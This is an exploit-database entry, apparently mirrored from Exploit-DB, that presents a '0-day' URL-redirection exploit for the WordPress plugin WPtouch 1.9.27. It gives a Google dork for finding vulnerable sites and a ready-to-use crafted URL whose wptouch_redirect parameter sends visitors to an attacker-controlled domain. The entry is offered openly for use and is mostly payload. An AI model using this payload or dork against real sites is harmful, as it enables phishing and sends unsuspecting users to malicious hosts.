[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Plugin WPtouch 1.9.27 - URL redirection

Author: MaKyOtOx
type: webapps
platform: php
port: 
date_added: 2011-06-21 
date_updated: 2011-06-21 
verified: 0 
codes: OSVDB-110087 
tags: WordPress Plugin
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comwptouch.1.9.27.zip
Hello , that's a 0day on the must downloaded WordPress plugin.

# Exploit Title: 0-Day WPtouch WordPress Plugin 1.9.27 URL redirection
# Google Dork: intext:"Powered by Wordpress + WPtouch" (with iphone/android
User-Agent)
# Author: MaKyOtOx (special Pwet to ansx & Zizounette for #bitcoins)
# Date: 20/06/2011
# Software Link: http://wordpress.org/extend/plugins/wptouch/
# Version: 1.9.27 (not tested on previous versions)
# Tested on: WhatEver OS
# CVE : 0-Day

http://site.com/?wptouch_view=normal&wptouch_redirect=.attacker-site.com

# It would redirect to : http://site.com.attacker-site.com :)
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.